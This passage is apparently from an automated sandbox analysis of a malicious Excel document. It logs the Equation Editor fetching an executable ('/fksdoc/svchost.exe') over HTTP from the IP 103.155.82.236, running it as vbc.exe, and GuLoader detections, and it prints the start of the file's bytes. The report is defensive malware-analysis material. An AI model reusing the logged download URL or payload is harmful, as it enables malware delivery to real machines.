                    Jun 10, 2021 15:17:33.896367073 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896385908 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896389961 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896411896 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896420002 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896435976 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896446943 CEST4916780192.168.2.22103.155.82.236

                    HTTP Request Dependency Graph

                    • 103.155.82.236

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249167103.155.82.23680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    TimestampkBytes transferredDirectionData
                    Jun 10, 2021 15:17:32.895608902 CEST0OUTGET /fksdoc/svchost.exe HTTP/1.1
                    Accept: */*
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 103.155.82.236
                    Connection: Keep-Alive
                    Jun 10, 2021 15:17:33.146260023 CEST1INHTTP/1.1 200 OK
                    Date: Thu, 10 Jun 2021 13:17:37 GMT
                    Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                    Last-Modified: Wed, 09 Jun 2021 07:07:06 GMT
                    ETag: "24000-5c44fec1ebc1c"
                    Accept-Ranges: bytes
                    Content-Length: 147456
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: application/x-msdownload
                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 03 b2 bb 47 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 10 02 00 00 30 00 00 00 00 00 00 10 1c 00 00 00 10 00 00 00 20 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 30 8e 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 0f 02 00 28 00 00 00 00 40 02 00 50 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 05 02 00 00 10 00 00 00 10 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 50 12 00 00 00 20 02 00 00 10 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 09 00 00 00 40 02 00 00 10 00 00 00 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#BBBL^B`BdBRichBPELG0 @P0$(@P( .text `.dataP @.rsrcP@0@@IMSVBVM60.DLL


                    Code Manipulations

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:15:16:46
                    Start date:10/06/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                    Imagebase:0x13f760000
                    File size:27641504 bytes
                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:15:17:07
                    Start date:10/06/2021
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                    Imagebase:0x400000
                    File size:543304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:15:17:11
                    Start date:10/06/2021
                    Path:C:\Users\Public\vbc.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Users\Public\vbc.exe'
                    Imagebase:0x400000
                    File size:147456 bytes
                    MD5 hash:99BBF83ABE9D6E4ECC91493E32230833
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:Visual Basic
                    Yara matches:
                    • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000004.00000000.2151758048.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                    Antivirus matches:
                    • Detection: 31%, Metadefender, Browse
                    • Detection: 59%, ReversingLabs
                    Reputation:low

                    Disassembly

                    Code Analysis

                    Reset < >